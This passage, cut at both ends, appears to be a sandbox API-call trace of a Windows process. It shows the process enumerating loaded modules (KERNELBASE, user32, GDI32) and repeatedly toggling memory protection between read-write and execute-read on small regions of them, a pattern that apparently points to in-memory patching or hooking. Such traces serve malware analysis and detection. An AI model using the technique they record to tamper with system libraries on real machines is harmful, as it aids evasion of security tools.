BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.566] GetCurrentProcess () returned 0xffffffff [0053.566] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df012c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.566] GetCurrentProcess () returned 0xffffffff [0053.566] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0130, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.566] GetCurrentProcess () returned 0xffffffff [0053.566] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0130, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.566] GetCurrentProcess () returned 0xffffffff [0053.566] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df01e4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.567] GetCurrentProcess () returned 0xffffffff [0053.567] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df01e4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.567] GetCurrentProcess () returned 0xffffffff [0053.567] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0278, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.568] GetCurrentProcess () returned 0xffffffff [0053.568] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0278, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.568] GetCurrentProcess () returned 0xffffffff [0053.568] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0284, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.568] GetCurrentProcess () returned 0xffffffff [0053.568] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0284, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.568] GetCurrentProcess () returned 0xffffffff [0053.568] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0338, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.569] GetCurrentProcess () returned 0xffffffff [0053.569] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0338, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.569] GetCurrentProcess () returned 0xffffffff [0053.569] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df04b0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.569] GetCurrentProcess () returned 0xffffffff [0053.570] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df04b0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.570] GetCurrentProcess () returned 0xffffffff [0053.570] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0718, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.570] GetCurrentProcess () returned 0xffffffff [0053.570] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0718, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.570] GetCurrentProcess () returned 0xffffffff [0053.570] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df071c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.571] GetCurrentProcess () returned 0xffffffff [0053.571] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df071c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.571] GetCurrentProcess () returned 0xffffffff [0053.571] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0720, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.571] GetCurrentProcess () returned 0xffffffff [0053.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0720, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.572] GetCurrentProcess () returned 0xffffffff [0053.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0724, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.573] GetCurrentProcess () returned 0xffffffff [0053.573] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0724, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.573] GetCurrentProcess () returned 0xffffffff [0053.573] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0774, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.573] GetCurrentProcess () returned 0xffffffff [0053.573] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0774, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.574] GetCurrentProcess () returned 0xffffffff [0053.574] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0780, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.574] GetCurrentProcess () returned 0xffffffff [0053.574] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0780, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.574] GetCurrentProcess () returned 0xffffffff [0053.574] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0784, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.574] GetCurrentProcess () returned 0xffffffff [0053.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0784, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.575] GetCurrentProcess () returned 0xffffffff [0053.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0924, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.575] GetCurrentProcess () returned 0xffffffff [0053.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0924, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.575] GetCurrentProcess () returned 0xffffffff [0053.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0bb8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.576] GetCurrentProcess () returned 0xffffffff [0053.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0bb8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.576] GetCurrentProcess () returned 0xffffffff [0053.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0d80, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.576] GetCurrentProcess () returned 0xffffffff [0053.577] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0d80, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.577] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.578] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.578] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.578] GetModuleFileNameA (in: hModule=0x76c10000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0053.578] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.579] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.579] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.579] GetModuleFileNameA (in: hModule=0x77130000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0053.579] GetCurrentProcess () returned 0xffffffff [0053.579] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7714035c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.580] GetCurrentProcess () returned 0xffffffff [0053.580] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7714035c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.580] GetCurrentProcess () returned 0xffffffff [0053.580] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7714036c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.581] GetCurrentProcess () returned 0xffffffff [0053.581] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7714036c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.581] GetCurrentProcess () returned 0xffffffff [0053.581] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7714038c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.581] GetCurrentProcess () returned 0xffffffff [0053.581] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7714038c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.581] GetCurrentProcess () returned 0xffffffff [0053.581] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140390, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.582] GetCurrentProcess () returned 0xffffffff [0053.582] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140390, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.582] GetCurrentProcess () returned 0xffffffff [0053.582] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140394, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.585] GetCurrentProcess () returned 0xffffffff [0053.585] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140394, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.585] GetCurrentProcess () returned 0xffffffff [0053.585] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140398, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.585] GetCurrentProcess () returned 0xffffffff [0053.585] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140398, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.586] GetCurrentProcess () returned 0xffffffff [0053.586] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x771403c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.586] GetCurrentProcess () returned 0xffffffff [0053.586] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x771403c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.586] GetCurrentProcess () returned 0xffffffff [0053.586] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140414, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.587] GetCurrentProcess () returned 0xffffffff [0053.587] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140414, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.587] GetCurrentProcess () returned 0xffffffff [0053.587] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140418, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.587] GetCurrentProcess () returned 0xffffffff [0053.587] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140418, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.587] GetCurrentProcess () returned 0xffffffff [0053.587] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7714044c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.588] GetCurrentProcess () returned 0xffffffff [0053.588] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7714044c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.588] GetCurrentProcess () returned 0xffffffff [0053.588] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140454, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.588] GetCurrentProcess () returned 0xffffffff [0053.589] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140454, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.589] GetCurrentProcess () returned 0xffffffff [0053.589] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140488, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.589] GetCurrentProcess () returned 0xffffffff [0053.589] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140488, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.589] GetCurrentProcess () returned 0xffffffff [0053.589] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x771404e0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.590] GetCurrentProcess () returned 0xffffffff [0053.590] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x771404e0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.590] GetCurrentProcess () returned 0xffffffff [0053.590] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x771404e4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.590] GetCurrentProcess () returned 0xffffffff [0053.590] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x771404e4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.591] GetCurrentProcess () returned 0xffffffff [0053.591] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x771404e8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.591] GetCurrentProcess () returned 0xffffffff [0053.591] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x771404e8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.591] GetCurrentProcess () returned 0xffffffff [0053.591] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140528, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.592] GetCurrentProcess () returned 0xffffffff [0053.592] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77140528, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77140000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.592] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.593] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.593] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.593] GetModuleFileNameA (in: hModule=0x770a0000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0053.593] GetCurrentProcess () returned 0xffffffff [0053.594] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b0024, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.594] GetCurrentProcess () returned 0xffffffff [0053.594] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b0024, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.594] GetCurrentProcess () returned 0xffffffff [0053.594] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b0028, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.594] GetCurrentProcess () returned 0xffffffff [0053.595] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b0028, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.595] GetCurrentProcess () returned 0xffffffff [0053.595] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b002c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.595] GetCurrentProcess () returned 0xffffffff [0053.595] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b002c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, 